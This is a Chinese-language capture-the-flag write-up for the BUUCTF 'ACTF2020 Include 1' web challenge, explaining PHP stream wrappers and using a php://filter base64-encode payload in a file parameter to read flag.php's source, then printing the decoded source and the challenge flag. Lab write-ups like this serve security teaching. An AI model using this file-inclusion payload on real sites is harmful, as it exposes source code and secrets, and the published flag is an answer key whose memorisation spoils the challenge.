1. 程式人生 > 其它 >[BUUCTF][Web][ACTF2020 新生賽]Include 1

[BUUCTF][Web][ACTF2020 新生賽]Include 1

開啟靶機對應的url
顯示一個tips 超連結
點選訪問超連結,對應Url為
http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=flag.php
顯示資訊Can you find out the flag, 右鍵檢視原始碼沒有任何內容
猜測flag在flag.php 原始碼中
嘗試通過php偽協議查出原始碼
考察知識點:
php://filter(本地磁碟檔案進行讀取)
元封裝器,設計用於”資料流開啟”時的”篩選過濾”應用,對本地磁碟檔案進行讀寫。

【php://協議】
條件:
不需要開啟allow_url_fopen,僅php://input、 php://stdin、 php://memory 和 php://temp 需要開啟allow_url_include。

php:// 訪問各個輸入/輸出流(I/O streams),在CTF中經常使用的是php://filter和php://input,php://filter用於讀取原始碼,php://input用於執行php程式碼。

構造url(使用base64編碼原因,防止檔案被當做php被執行)

http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php

得到

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ZmQ3ZjhmYTAtNjJjZi00NTVlLThmYTMtNWNhMTY2MDJkNTdifQo=

base64轉碼得到

<?php
echo "Can you find out the flag?";
//flag{fd7f8fa0-62cf-455e-8fa3-5ca16602d57b}

Boom